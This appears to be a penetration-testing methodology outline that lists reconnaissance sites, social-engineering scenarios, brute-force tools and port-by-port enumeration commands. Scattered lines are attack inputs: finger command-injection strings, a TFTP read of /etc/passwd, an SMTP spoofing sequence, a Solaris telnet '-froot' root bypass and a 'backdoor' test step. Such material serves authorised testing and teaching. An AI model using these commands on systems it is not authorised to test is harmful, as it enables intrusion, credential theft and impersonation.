Penetration Testing Framework 0.58


1. X11 port 6000+ open

1.1. X11 Enumeration

1.1.1. List open windows

1.1.2. Authentication Method

1.1.2.1. Xauth

1.1.2.2. Xhost

1.2. X11 Exploitation

1.2.1. xwd

1.2.1.1. xwd -display 192.168.0.1:0 -root -out 192.168.0.1.xpm

1.2.2. Keystrokes

1.2.2.1. Received

1.2.2.2. Transmitted

1.2.3. Screenshots

1.2.4. xhost +

1.3. Examine Configuration Files

1.3.1. /etc/Xn.hosts

1.3.2. /usr/lib/X11/xdm

1.3.3. /usr/lib/X11/xdm/xsession

1.3.4. /usr/lib/X11/xdm/xsession-remote

1.3.5. /usr/lib/X11/xdm/xsession.0

1.3.6. /usr/lib/X11/xdm/xdm-config

1.3.6.1. DisplayManager*authorize:on

2. pwdump [-h][-o][-u][-p] machineName

3. Nabil contributed the AS/400 section.

4. Client Side Security

5. Back end files

5.1. .exe / .txt / .doc / .ppt / .pdf / .vbs / .pl / .sh / .bat / .sql / .xls / .mdb / .conf

6. Set objShell = CreateObject("WScript.Shell")

7. Check visible areas for sensitive information.

8. InitialProgram=c:\windows\system32\cmd.exe

9. txdns --verbose -fm wordlist.dic --server ip_address -rr SOA domain_name -h c:\hostlist.txt

10. http://secunia.com/advisories/search/?search=citrix

11. Pre-Inspection Visit - template

12. Network Footprinting (Reconnaissance) - The tester attempts to gather as much information as possible about the selected network. Reconnaissance can take two forms: active and passive. Passive reconnaissance is always the best starting point, as it would normally evade intrusion detection systems and the other forms of protection afforded to the network; it usually involves discovering publicly available information with a web browser, by visiting newsgroups and so on. Active reconnaissance is more intrusive and may show up in audit logs; it may take the form of an attempted DNS zone transfer or a social engineering type of attack.

12.1. Untitled

12.1.1. Authoritative Bodies

12.1.1.1. IANA - Internet Assigned Numbers Authority

12.1.1.2. ICANN - Internet Corporation for Assigned Names and Numbers.

12.1.1.3. NRO - Number Resource Organisation

12.1.1.4. RIR - Regional Internet Registry

12.1.1.4.1. AFRINIC - African Network Information Centre

12.1.1.4.2. APNIC - Asia Pacific Network Information Centre

12.1.1.4.3. ARIN - American Registry for Internet Numbers

12.1.1.4.4. LACNIC - Latin America & Caribbean Network Information Centre

12.1.1.4.5. RIPE - Réseaux IP Européens Network Coordination Centre

12.1.2. Websites

12.1.2.1. Central Ops

12.1.2.1.1. Domain Dossier

12.1.2.1.2. Email Dossier

12.1.2.2. DNS Stuff

12.1.2.2.1. Online DNS one-stop shop, able to perform a wide range of different DNS queries.

12.1.2.3. Fixed Orbit

12.1.2.3.1. Autonomous System lookups and other online tools available.

12.1.2.4. Geektools

12.1.2.5. IP2Location

12.1.2.5.1. Allows limited free IP lookups to be performed, displaying geolocation information, ISP details and other pertinent information.

12.1.2.6. Kartoo

12.1.2.6.1. Metasearch engine that visually presents its results.

12.1.2.7. MyIPNeighbors.com

12.1.2.7.1. Excellent site that lists the domains sharing the queried IP address and, conversely, resolves an IP address to its DNS names.

12.1.2.8. My-IP-Neighbors.com

12.1.2.8.1. Excellent site that can be used if the above is down

12.1.2.9. myipneighbors.net

12.1.2.10. Netcraft

12.1.2.10.1. Online search tool allowing queries for host information.

12.1.2.11. Passive DNS Replication

12.1.2.11.1. Finds shared domains based on supplied IP addresses

12.1.2.11.2. Note: website used by the nmap hostmap.nse script.

12.1.2.12. Robtex

12.1.2.12.1. Excellent website allowing DNS and AS lookups to be performed, with a graphical display of the results showing PTR, A and MX records and AS connectivity.

12.1.2.12.2. Note: can be unreliable with old entries (use CentralOps to verify).

12.1.2.13. Traceroute.org

12.1.2.13.1. Website listing a large number of links to online traceroute resources.

12.1.2.14. Wayback Machine

12.1.2.14.1. Stores older versions of websites, making it a good comparison tool and excellent resource for previously removed data.

12.1.2.15. Whois.net

12.1.3. Tools

12.1.3.1. Cheops-ng

12.1.3.2. Country whois

12.1.3.3. Domain Research Tool

12.1.3.4. Firefox Plugins

12.1.3.4.1. AS Number

12.1.3.4.2. Shazou

12.1.3.4.3. Firecat Suite

12.1.3.5. Gnetutil

12.1.3.6. Goolag Scanner

12.1.3.7. Greenwich

12.1.3.8. Maltego

12.1.3.9. GTWhois

12.1.3.10. Sam Spade

12.1.3.11. Smart whois

12.1.3.12. SpiderFoot

12.2. Internet Search

12.2.1. General Information

12.2.1.1. Web Investigator

12.2.1.2. Tracesmart

12.2.1.3. Friends Reunited

12.2.1.4. Ebay - profiles etc.

12.2.2. Financial

12.2.2.1. EDGAR - Company information, including real-time filings. US

12.2.2.2. Google Finance - General Finance Portal

12.2.2.3. Hoovers - Business Intelligence, Insight and Results. US and UK

12.2.2.4. Companies House UK

12.2.2.5. Land Registry UK

12.2.3. Phone book/ Electoral Roll Information

12.2.3.1. 123people

12.2.3.1.1. http://www.123people.co.uk/s/firstname+lastname/world

12.2.3.2. 192.com

12.2.3.2.1. Electoral Roll Search. UK

12.2.3.3. 411

12.2.3.3.1. Online White Pages and Yellow Pages. US

12.2.3.4. Untitled

12.2.3.4.1. Background Check, Phone Number Lookup, Trace email, Criminal record, Find People, cell phone number search, License Plate Search. US

12.2.3.5. BT.com. UK

12.2.3.5.1. Residential

12.2.3.5.2. Business

12.2.3.6. Pipl

12.2.3.6.2. http://pipl.com/search/?Email=john%40example.com&CategoryID=4&Interface=1

12.2.3.6.3. http://pipl.com/search/?Username=????&CategoryID=5&Interface=1

12.2.3.7. Spokeo

12.2.3.7.1. http://www.spokeo.com/user?q=domain_name

12.2.3.7.2. http://www.spokeo.com/user?q=email_address

12.2.3.8. Yasni

12.2.3.8.1. http://www.yasni.co.uk/index.php?action=search&search=1&sh=&name=firstname+lastname&filter=Keyword

12.2.3.9. Zabasearch

12.2.3.9.1. People Search Engine. US

12.2.4. Generic Web Searching

12.2.4.1. Code Search

12.2.4.2. Forum Entries

12.2.4.3. Google Hacking Database

12.2.4.4. Google

12.2.4.4.1. Email Addresses

12.2.4.4.2. Contact Details

12.2.4.5. Newsgroups/forums

12.2.4.6. Blog Search

12.2.4.6.1. Yammer

12.2.4.6.2. Google Blog Search

12.2.4.6.3. Technorati

12.2.4.6.4. Jaiku

12.2.4.6.5. Present.ly

12.2.4.6.6. Twitter Network Browser

12.2.4.7. Search Engine Comparison/ Aggregator Sites

12.2.4.7.1. Clusty

12.2.4.7.2. Grokker

12.2.4.7.3. Zuula

12.2.4.7.4. Exalead

12.2.4.7.5. Delicious

12.2.5. Metadata Search

12.2.5.1. Untitled

12.2.5.1.1. MetaData Visualisation Sites

12.2.5.1.2. Tools

12.2.5.1.3. Wikipedia Metadata Search

12.2.6. Social/ Business Networks

12.2.6.1. Untitled

12.2.6.1.1. Africa

12.2.6.1.2. Australia

12.2.6.1.3. Belgium

12.2.6.1.4. Holland

12.2.6.1.5. Hungary

12.2.6.1.6. Iran

12.2.6.1.7. Japan

12.2.6.1.8. Korea

12.2.6.1.9. Poland

12.2.6.1.10. Russia

12.2.6.1.11. Sweden

12.2.6.1.12. UK

12.2.6.1.13. US

12.2.6.1.14. Assorted

12.2.7. Resources

12.2.7.1. OSINT

12.2.7.2. International Directory of Search Engines

12.3. DNS Record Retrieval from publicly available servers

12.3.1. Types of Information Records

12.3.1.1. SOA Records - Indicates the server that has authority for the domain.

12.3.1.2. MX Records - List of a host’s or domain’s mail exchanger server(s).

12.3.1.3. NS Records - List of a host’s or domain’s name server(s).

12.3.1.4. A Records - An address record that allows a computer name to be translated to an IP address. Each computer has to have this record for its IP address to be located via DNS.

12.3.1.5. PTR Records - Maps an IP address back to a host's domain name (reverse lookup).

12.3.1.6. SRV Records - Service location record.

12.3.1.7. HINFO Records - Host information record with CPU type and operating system.

12.3.1.8. TXT Records - Generic text record.

12.3.1.9. CNAME - A host’s canonical name allows additional names/ aliases to be used to locate a computer.

12.3.1.10. RP - Responsible person for the domain.

12.3.2. Database Settings

12.3.2.1. Version.bind

12.3.2.2. Serial

12.3.2.3. Refresh

12.3.2.4. Retry

12.3.2.5. Expiry

12.3.2.6. Minimum

12.3.3. Sub Domains

12.3.4. Internal IP ranges

12.3.4.1. Reverse DNS for IP Range

12.3.5. Zone Transfer

12.4. Social Engineering

12.4.1. Remote

12.4.1.1. Phone

12.4.1.1.1. Scenarios

12.4.1.1.2. Results

12.4.1.1.3. Contact Details

12.4.1.2. Email

12.4.1.2.1. Scenarios

12.4.1.2.2. Software

12.4.1.2.3. Results

12.4.1.2.4. Contact Details

12.4.1.3. Other

12.4.2. Local

12.4.2.1. Personas

12.4.2.1.1. Name

12.4.2.1.2. Phone

12.4.2.1.3. Email

12.4.2.1.4. Business Cards

12.4.2.2. Contact Details

12.4.2.2.1. Name

12.4.2.2.2. Phone number

12.4.2.2.3. Email

12.4.2.2.4. Room number

12.4.2.2.5. Department

12.4.2.2.6. Role

12.4.2.3. Scenarios

12.4.2.3.1. New IT employee

12.4.2.3.2. Fire Inspector

12.4.2.4. Results

12.4.2.5. Maps

12.4.2.5.1. Satellite Imagery

12.4.2.5.2. Building layouts

12.4.2.6. Other

12.5. Dumpster Diving

12.5.1. Rubbish Bins

12.5.2. Contract Waste Removal

12.5.3. Ebay ex-stock sales, e.g. HDDs

12.6. Web Site copy

12.6.1. httrack

12.6.2. teleport pro

12.6.3. Black Widow

13. Discovery & Probing - Enumeration can serve two distinct purposes in an assessment: OS fingerprinting, and identifying the remote applications being served. OS fingerprinting (TCP/IP stack fingerprinting) is the process of determining the operating system in use on a remote host, carried out by analysing the packets received from that host. There are two distinct ways to OS fingerprint: actively (e.g. nmap) or passively (e.g. scanrand). Passive OS fingerprinting determines the remote OS using only the packets received and does not require any packets to be sent. Active OS fingerprinting is very noisy: it sends packets to the remote host and waits for a reply (or the lack of one). Different OSs respond differently to certain types of packet (the response is governed by the relevant RFC plus any proprietary behaviour the vendor, notably Microsoft, has enabled within the system), so custom-crafted packets may be sent. The remote applications being served on a host can be determined from the open ports on that host; by port scanning it is then possible to build up a picture of which applications are running and tailor the test accordingly.

13.1. Default Port Lists

13.1.1. Windows

13.1.2. *nix

13.2. Enumeration tools and techniques - The vast majority can be used generically; however, certain bespoke applications require their own specific toolsets. Default passwords are platform and vendor specific.

13.2.1. General Enumeration Tools

13.2.1.1. nmap

13.2.1.1.1. nmap -n -A -PN -p- -T Aggressive -iL nmap.targetlist -oX nmap.syn.results.xml

13.2.1.1.2. nmap -sU -PN -v -O -p 1-30000 -T polite -iL nmap.targetlist > nmap.udp.results

13.2.1.1.3. nmap -sV -PN -v -p 21,22,23,25,53,80,443,161 -iL nmap.targets > nmap.version.results

13.2.1.1.4. nmap -A -sS -PN -n --script:all ip_address --reason

13.2.1.1.5. grep "appears to be up" nmap_saved_filename | awk -F\( '{print $2}' | awk -F\) '{print $1}' > ip_list

13.2.1.2. netcat

13.2.1.2.1. nc -v -n IP_Address port

13.2.1.2.2. nc -v -w 2 -z IP_Address port_range/port_number

13.2.1.3. amap

13.2.1.3.1. amap -bqv 192.168.1.1 80

13.2.1.3.2. amap [-A|-B|-P|-W] [-1buSRHUdqv] [[-m] -o <file>] [-D <file>] [-t/-T sec] [-c cons] [-C retries] [-p proto] [-i <file>] [target port [port] ...]

13.2.1.4. xprobe2

13.2.1.4.1. xprobe2 192.168.1.1

13.2.1.5. sinfp

13.2.1.5.1. ./sinfp.pl -i -p

13.2.1.6. nbtscan

13.2.1.6.1. nbtscan [-v] [-d] [-e] [-l] [-t timeout] [-b bandwidth] [-r] [-q] [-s separator] [-m retransmits] (-f filename) | (<scan_range>)

13.2.1.7. hping

13.2.1.7.1. hping ip_address

13.2.1.8. scanrand

13.2.1.8.1. scanrand ip_address:all

13.2.1.9. unicornscan

13.2.1.9.1. unicornscan [options `b:B:d:De:EFhi:L:m:M:pP:q:r:R:s:St:T:w:W:vVZ:'] IP_ADDRESS/CIDR_NET_MASK:S-E

13.2.1.10. netenum

13.2.1.10.1. netenum network/netmask timeout

13.2.1.11. fping

13.2.1.11.1. fping -a -d hostname/ (Network/Subnet_Mask)

13.2.2. Firewall Specific Tools

13.2.2.1. firewalk

13.2.2.1.1. firewalk -p [protocol] -d [destination_port] -s [source_port] [internal_IP] [gateway_IP]

13.2.2.2. ftester

13.2.2.2.1. On host 1: ./ftestd -i eth0 -v ; on host 2: ./ftest -f ftest.conf -v -d 0.01 ; then: ./freport ftest.log ftestd.log

13.2.3. Default Passwords (Examine list)

13.2.3.1. Passwords A

13.2.3.2. Passwords B

13.2.3.3. Passwords C

13.2.3.4. Passwords D

13.2.3.5. Passwords E

13.2.3.6. Passwords F

13.2.3.7. Passwords G

13.2.3.8. Passwords H

13.2.3.9. Passwords I

13.2.3.10. Passwords J

13.2.3.11. Passwords K

13.2.3.12. Passwords L

13.2.3.13. Passwords M

13.2.3.14. Passwords N

13.2.3.15. Passwords O

13.2.3.16. Passwords P

13.2.3.17. Passwords R

13.2.3.18. Passwords S

13.2.3.19. Passwords T

13.2.3.20. Passwords U

13.2.3.21. Passwords V

13.2.3.22. Passwords W

13.2.3.23. Passwords X

13.2.3.24. Passwords Y

13.2.3.25. Passwords Z

13.2.3.26. Passwords (Numeric)

13.3. Active Hosts

13.3.1. Open TCP Ports

13.3.2. Closed TCP Ports

13.3.3. Open UDP Ports

13.3.4. Closed UDP Ports

13.3.5. Service Probing

13.3.5.1. SMTP Mail Bouncing

13.3.5.2. Banner Grabbing

13.3.5.2.1. Other

13.3.5.2.2. HTTP

13.3.5.2.3. HTTPS

13.3.5.2.4. SMTP

13.3.5.2.5. POP3

13.3.5.2.6. FTP

13.3.6. ICMP Responses

13.3.6.1. Type 3 (Port Unreachable)

13.3.6.2. Type 8 (Echo Request)

13.3.6.3. Type 13 (Timestamp Request)

13.3.6.4. Type 15 (Information Request)

13.3.6.5. Type 17 (Subnet Address Mask Request)

13.3.6.6. Responses from broadcast address

13.3.7. Source Port Scans

13.3.7.1. TCP/UDP 53 (DNS)

13.3.7.2. TCP 20 (FTP Data)

13.3.7.3. TCP 80 (HTTP)

13.3.7.4. TCP/UDP 88 (Kerberos)

13.3.8. Firewall Assessment

13.3.8.1. Firewalk

13.3.8.2. TCP/UDP/ICMP responses

13.3.9. OS Fingerprint

14. Enumeration

14.1. Daytime port 13 open

14.1.1. nmap nse script

14.1.1.1. daytime

14.2. FTP port 21 open

14.2.1. Fingerprint server

14.2.1.1. telnet ip_address 21 (Banner grab)

14.2.1.2. Run command ftp ip_address

14.2.1.3. [email protected]

14.2.1.4. Check for anonymous access

14.2.1.4.1. ftp ip_address ; Username: anonymous OR anon ; Password: [email protected]

14.2.2. Password guessing

14.2.2.1. Hydra brute force

14.2.2.2. medusa

14.2.2.3. Brutus

14.2.3. Examine configuration files

14.2.3.1. ftpusers

14.2.3.2. ftp.conf

14.2.3.3. proftpd.conf

14.2.4. MiTM

14.2.4.1. pasvagg.pl

14.3. SSH port 22 open

14.3.1. Fingerprint server

14.3.1.1. telnet ip_address 22 (banner grab)

14.3.1.2. scanssh

14.3.1.2.1. scanssh -p -r -e excludes random(no.)/Network_ID/Subnet_Mask

14.3.2. Password guessing

14.3.2.1. ssh root@ip_address

14.3.2.2. guess-who

14.3.2.2.1. ./b -l username -h ip_address -p 22 -2 < password_file_location

14.3.2.3. Hydra brute force

14.3.2.4. brutessh

14.3.2.5. Ruby SSH Bruteforcer

14.3.3. Examine configuration files

14.3.3.1. ssh_config

14.3.3.2. sshd_config

14.3.3.3. authorized_keys

14.3.3.4. ssh_known_hosts

14.3.3.5. .shosts

14.3.4. SSH Client programs

14.3.4.1. tunnelier

14.3.4.2. winsshd

14.3.4.3. putty

14.3.4.4. winscp

14.4. Telnet port 23 open

14.4.1. Fingerprint server

14.4.1.1. telnet ip_address

14.4.1.1.1. Common Banner List (OS - Banner)
Solaris 8 - SunOS 5.8
Solaris 2.6 - SunOS 5.6
Solaris 2.4 or 2.5.1 - Unix(r) System V Release 4.0 (hostname)
SunOS 4.1.x - SunOS Unix (hostname)
FreeBSD - FreeBSD/i386 (hostname) (ttyp1)
NetBSD - NetBSD/i386 (hostname) (ttyp1)
OpenBSD - OpenBSD/i386 (hostname) (ttyp1)
Red Hat 8.0 - Red Hat Linux release 8.0 (Psyche)
Debian 3.0 - Debian GNU/Linux 3.0 / hostname
SGI IRIX 6.x - IRIX (hostname)
IBM AIX 4.1.x - AIX Version 4 (C) Copyrights by IBM and by others 1982, 1994.
IBM AIX 4.2.x or 4.3.x - AIX Version 4 (C) Copyrights by IBM and by others 1982, 1996.
Nokia IPSO - IPSO (hostname) (ttyp0)
Cisco IOS - User Access Verification
Livingston ComOS - ComOS - Livingston PortMaster

14.4.1.2. telnetfp

14.4.2. Password Attack

14.4.2.2. Hydra brute force

14.4.2.3. Brutus

14.4.2.4. telnet -l "-froot" hostname (Solaris 10+)

14.4.3. Examine configuration files

14.4.3.1. /etc/inetd.conf

14.4.3.2. /etc/xinetd.d/telnet

14.4.3.3. /etc/xinetd.d/stelnet

14.5. Sendmail Port 25 open

14.5.1. Fingerprint server

14.5.1.1. telnet ip_address 25 (banner grab)

14.5.2. Mail Server Testing

14.5.2.1. Enumerate users

14.5.2.1.1. VRFY username (verifies if username exists - enumeration of accounts)

14.5.2.1.2. EXPN username (verifies if username is valid - enumeration of accounts)

14.5.2.2. Mail Spoof Test

14.5.2.2.1. HELO anything
MAIL FROM: spoofed_address
RCPT TO: valid_mail_account
DATA
.
QUIT

14.5.2.3. Mail Relay Test

14.5.3. Examine Configuration Files

14.5.3.1. sendmail.cf

14.5.3.2. submit.cf

14.6. DNS port 53 open

14.6.1. Fingerprint server/ service

14.6.1.1. host

14.6.1.1.1. host [-aCdlnrTwv] [-c class] [-N ndots] [-R number] [-t type] [-W wait] name [server]
-v verbose format
-t (query type) allows a user to specify a record type, e.g. A, NS or PTR
-a same as -t ANY
-l zone transfer (if allowed)
-f save to a specified filename

14.6.1.2. nslookup

14.6.1.2.1. nslookup [ -option ... ] [ host-to-find | - [ server ]]

14.6.1.3. dig

14.6.1.3.1. dig [ @server ] [-b address ] [-c class ] [-f filename ] [-k filename ] [-p port# ] [-t type ] [-x addr ] [-y name:key ] [-4 ] [-6 ] [name ] [type ] [class ] [queryopt... ]

14.6.1.4. whois
-h Use the named host to resolve the query
-a Use ARIN to resolve the query
-r Use RIPE to resolve the query
-p Use APNIC to resolve the query
-Q Perform a quick lookup

14.6.2. DNS Enumeration

14.6.2.1. Bile Suite

14.6.2.1.1. perl BiLE.pl [website] [project_name]

14.6.2.1.2. perl BiLE-weigh.pl [website] [input file]

14.6.2.1.3. perl vet-IPrange.pl [input file] [true domain file] [output file] <range>

14.6.2.1.4. perl vet-mx.pl [input file] [true domain file] [output file]

14.6.2.1.5. perl exp-tld.pl [input file] [output file]

14.6.2.1.6. perl jarf-dnsbrute [domain_name] (brutelevel) [file_with_names]

14.6.2.1.7. perl qtrace.pl [ip_address_file] [output_file]

14.6.2.1.8. perl jarf-rev [subnetblock] [nameserver]

14.6.2.2. txdns

14.6.2.2.1. txdns -rt -t domain_name

14.6.2.2.2. txdns -x 50 -bb domain_name

14.6.2.3. nmap nse scripts

14.6.2.3.1. dns-random-srcport

14.6.2.3.2. dns-random-txid

14.6.2.3.3. dns-recursion

14.6.2.3.4. dns-zone-transfer

14.6.3. Examine Configuration Files

14.6.3.1. host.conf

14.6.3.2. resolv.conf

14.6.3.3. named.conf

14.7. TFTP port 69 open

14.7.1. TFTP Enumeration

14.7.1.1. tftp ip_address PUT local_file

14.7.1.2. tftp ip_address GET conf.txt (or other files)

14.7.1.3. Solarwinds TFTP server

14.7.1.4. tftp -i <IP> GET /etc/passwd (old Solaris)

14.7.2. TFTP Bruteforcing

14.7.2.1. TFTP bruteforcer

14.7.2.2. Cisco-Torch

14.8. Finger Port 79 open

14.8.1. User enumeration

14.8.1.1. finger 'a b c d e f g h' @example.com

14.8.1.2. finger [email protected]

14.8.1.3. finger [email protected]

14.8.1.4. finger [email protected]

14.8.1.5. finger [email protected]

14.8.1.6. finger **@example.com

14.8.1.7. finger [email protected]

14.8.1.8. finger @example.com

14.8.1.9. nmap nse script

14.8.1.9.1. finger

14.8.2. Command execution

14.8.2.1. finger "|/bin/[email protected]"

14.8.2.2. finger "|/bin/ls -a /@example.com"

14.8.3. Finger Bounce

14.8.3.1. finger user@host@victim

14.8.3.2. finger @internal@external

14.9. Web Ports 80,8080 etc. open

14.9.1. Fingerprint server

14.9.1.1. Telnet ip_address port

14.9.1.2. Firefox plugins

14.9.1.2.1. All

14.9.1.2.2. Specific

14.9.2. Crawl website

14.9.2.1. lynx [options] startfile/URL (options include -traversal, -crawl, -dump, -image_links, -source)

14.9.2.2. httprint

14.9.2.3. Metagoofil

14.9.2.3.1. metagoofil.py -d [domain] -l [no. of] -f [type] -o results.html

14.9.3. Web Directory enumeration

14.9.3.1. Nikto

14.9.3.1.1. nikto [-h target] [options]

14.9.3.2. DirBuster

14.9.3.3. Wikto

14.9.3.4. Goolag Scanner

14.9.4. Vulnerability Assessment

14.9.4.1. Manual Tests

14.9.4.1.1. Default Passwords

14.9.4.1.2. Install Backdoors

14.9.4.1.3. Method Testing

14.9.4.1.4. Upload Files

14.9.4.1.5. View Page Source

14.9.4.1.6. Input Validation Checks

14.9.4.1.7. Automated table and column iteration

14.9.4.2. Vulnerability Scanners

14.9.4.2.1. Acunetix

14.9.4.2.2. Grendelscan

14.9.4.2.3. NStealth

14.9.4.2.4. Obiwan III

14.9.4.2.5. w3af

14.9.4.3. Specific Applications/ Server Tools

14.9.4.3.1. Domino

14.9.4.3.2. Joomla

14.9.4.3.3. aspaudit.pl

14.9.4.3.4. Vbulletin

14.9.4.3.5. ZyXel

14.9.5. Proxy Testing

14.9.5.1. Burpsuite

14.9.5.2. Crowbar

14.9.5.3. Interceptor

14.9.5.4. Paros

14.9.5.5. Requester Raw

14.9.5.6. Suru

14.9.5.7. WebScarab

14.9.6. Examine configuration files

14.9.6.1. Generic

14.9.6.1.1. Examine httpd.conf/ windows config files

14.9.6.2. JBoss

14.9.6.2.1. JMX Console http://<IP>:8080/jmx-console/

14.9.6.3. Joomla

14.9.6.3.1. configuration.php

14.9.6.3.2. diagnostics.php

14.9.6.3.3. joomla.inc.php

14.9.6.3.4. config.inc.php

14.9.6.4. Mambo

14.9.6.4.1. configuration.php

14.9.6.4.2. config.inc.php

14.9.6.5. Wordpress

14.9.6.5.1. setup-config.php

14.9.6.5.2. wp-config.php

14.9.6.6. ZyXel

14.9.6.6.1. /WAN.html (contains PPPoE ISP password)

14.9.6.6.2. /WLAN_General.html and /WLAN.html (contains WEP key)

14.9.6.6.3. /rpDyDNS.html (contains DDNS credentials)

14.9.6.6.4. /Firewall_DefPolicy.html (Firewall)

14.9.6.6.5. /CF_Keyword.html (Content Filter)

14.9.6.6.6. /RemMagWWW.html (Remote MGMT)

14.9.6.6.7. /rpSysAdmin.html (System)

14.9.6.6.8. /LAN_IP.html (LAN)

14.9.6.6.9. /NAT_General.html (NAT)

14.9.6.6.10. /ViewLog.html (Logs)

14.9.6.6.11. /rpFWUpload.html (Tools)

14.9.6.6.12. /DiagGeneral.html (Diagnostic)

14.9.6.6.13. /RemMagSNMP.html (SNMP Passwords)

14.9.6.6.14. /LAN_ClientList.html (Current DHCP Leases)

14.9.6.6.15. Config Backups

14.9.7. Examine web server logs

14.9.7.1. c:\winnt\system32\Logfiles\W3SVC1

14.9.7.1.1. awk -F " " '{print $3,$11}' filename | sort | uniq

14.9.8. References

14.9.8.1. White Papers

14.9.8.1.1. Cross Site Request Forgery: An Introduction to a Common Web Application Weakness

14.9.8.1.2. Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity

14.9.8.1.3. Blind Security Testing - An Evolutionary Approach

14.9.8.1.4. Command Injection in XML Signatures and Encryption

14.9.8.1.5. Input Validation Cheat Sheet

14.9.8.1.6. SQL Injection Cheat Sheet

14.9.8.2. Books

14.9.8.2.1. Hacking Exposed Web 2.0

14.9.8.2.2. Hacking Exposed Web Applications

14.9.8.2.3. The Web Application Hacker's Handbook

14.9.9. Exploit Frameworks

14.9.9.1. Brute-force Tools

14.9.9.1.1. Acunetix

14.9.9.2. Metasploit

14.9.9.3. w3af

14.10. Portmapper port 111 open

14.10.1. rpcdump.py

14.10.1.1. rpcdump.py username:password@IP_Address port/protocol (i.e. 80/HTTP)

14.10.2. rpcinfo

14.10.2.1. rpcinfo [options] IP_Address

14.11. NTP Port 123 open

14.11.1. NTP Enumeration

14.11.1.1. ntpdc -c monlist IP_ADDRESS

14.11.1.2. ntpdc -c sysinfo IP_ADDRESS

14.11.1.3. ntpq

14.11.1.3.1. host

14.11.1.3.2. hostname

14.11.1.3.3. ntpversion

14.11.1.3.4. readlist

14.11.1.3.5. version

14.11.2. Examine configuration files

14.11.2.1. ntp.conf

14.11.3. nmap nse script

14.11.3.1. ntp-info

14.12. NetBIOS Ports 135-139,445 open

14.12.1. NetBIOS enumeration

14.12.1.1. Enum

14.12.1.1.1. enum <-UMNSPGLdc> <-u username> <-p password> <-f dictfile> <hostname|ip>

14.12.1.2. Null Session

14.12.1.2.1. net use \\192.168.1.1\ipc$ "" /u:""

14.12.1.3. Smbclient

14.12.1.3.1. smbclient -L //server/share password options

14.12.1.4. Superscan

14.12.1.4.1. Enumeration tab.

14.12.1.5. user2sid/sid2user

14.12.1.6. Winfo

14.12.2. NetBIOS brute force

14.12.2.1. Hydra

14.12.2.2. Brutus

14.12.2.3. Cain & Abel

14.12.2.4. getacct

14.12.2.5. NAT (NetBIOS Auditing Tool)

14.12.3. Examine Configuration Files

14.12.3.1. Smb.conf

14.12.3.2. lmhosts

14.13. SNMP port 161 open

14.13.1. Default Community Strings

14.13.1.1. public

14.13.1.2. private

14.13.1.3. cisco

14.13.1.3.1. cable-docsis

14.13.1.3.2. ILMI

14.13.2. MIB enumeration

14.13.2.1. Windows NT

14.13.2.1.1. .1.3.6.1.2.1.1.5 Hostnames

14.13.2.1.2. .1.3.6.1.4.1.77.1.4.2 Domain Name

14.13.2.1.3. .1.3.6.1.4.1.77.1.2.25 Usernames

14.13.2.1.4. .1.3.6.1.4.1.77.1.2.3.1.1 Running Services

14.13.2.1.5. .1.3.6.1.4.1.77.1.2.27 Share Information

14.13.2.2. Solarwinds MIB walk

14.13.2.3. Getif

14.13.2.4. snmpwalk

14.13.2.4.1. snmpwalk -v <Version> -c <Community string> <IP>

14.13.2.5. Snscan

14.13.2.6. Applications

14.13.2.6.1. ZyXel

14.13.2.7. nmap nse script

14.13.2.7.1. snmp-sysdescr

14.13.3. SNMP Bruteforce

14.13.3.1. onesixtyone

14.13.3.1.1. onesixtyone -c SNMP.wordlist <IP>

14.13.3.2. cat

14.13.3.2.1. ./cat -h <IP> -w SNMP.wordlist

14.13.3.3. Solarwinds SNMP Brute Force

14.13.3.4. ADMsnmp

14.13.3.5. nmap nse script

14.13.3.5.1. snmp-brute

14.13.4. Examine SNMP Configuration files

14.13.4.1. snmp.conf

14.13.4.2. snmpd.conf

14.13.4.3. snmp-config.xml

14.14. LDAP Port 389 Open

14.14.1. ldap enumeration

14.14.1.1. ldapminer

14.14.1.1.1. ldapminer -h ip_address -p port (not required if default) -d

14.14.1.2. luma

14.14.1.2.1. GUI-based tool

14.14.1.3. ldp

14.14.1.3.1. GUI-based tool

14.14.1.4. openldap

14.14.1.4.1. ldapsearch [-n] [-u] [-v] [-k] [-K] [-t] [-A] [-L[L[L]]] [-M[M]] [-d debuglevel] [-f file] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-p ldapport] [-P 2|3] [-b searchbase] [-s base|one|sub] [-a never|always|search|find] [-l timelimit] [-z sizelimit] [-O security-properties] [-I] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] filter [attrs...]

14.14.1.4.2. ldapadd [-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-h ldaphost][-p ldap-port][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]

14.14.1.4.3. ldapdelete [-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-f file][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-P 2|3][-p ldapport][-O security-properties][-U authcid][-R realm][-x][-I][-Q] [-X authzid][-Y mech][-Z[Z]][dn]

14.14.1.4.4. ldapmodify [-a][-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]

14.14.1.4.5. ldapmodrdn [-r][-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile] [-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x] [-X authzid][-Y mech][-Z[Z]][-f file][dn rdn]

14.14.2. ldap brute force

14.14.2.1. bf_ldap

14.14.2.1.1. bf_ldap -s server -d domain_name -u|-U username|users_list_file -L|-l passwords_list|length_of_passwords_to_generate [-p port (default 389)] [-v (verbose mode)] [-P LDAP user path (default ,CN=Users,)]

14.14.2.2. K0ldS

14.14.2.3. LDAP_Brute.pl

14.14.3. Examine Configuration Files

14.14.3.1. General

14.14.3.1.1. containers.ldif

14.14.3.1.2. ldap.cfg

14.14.3.1.3. ldap.conf

14.14.3.1.4. ldap.xml

14.14.3.1.5. ldap-config.xml

14.14.3.1.6. ldap-realm.xml

14.14.3.1.7. slapd.conf

14.14.3.2. IBM SecureWay V3 server

14.14.3.2.1. V3.sas.oc

14.14.3.3. Microsoft Active Directory server

14.14.3.3.1. msadClassesAttrs.ldif

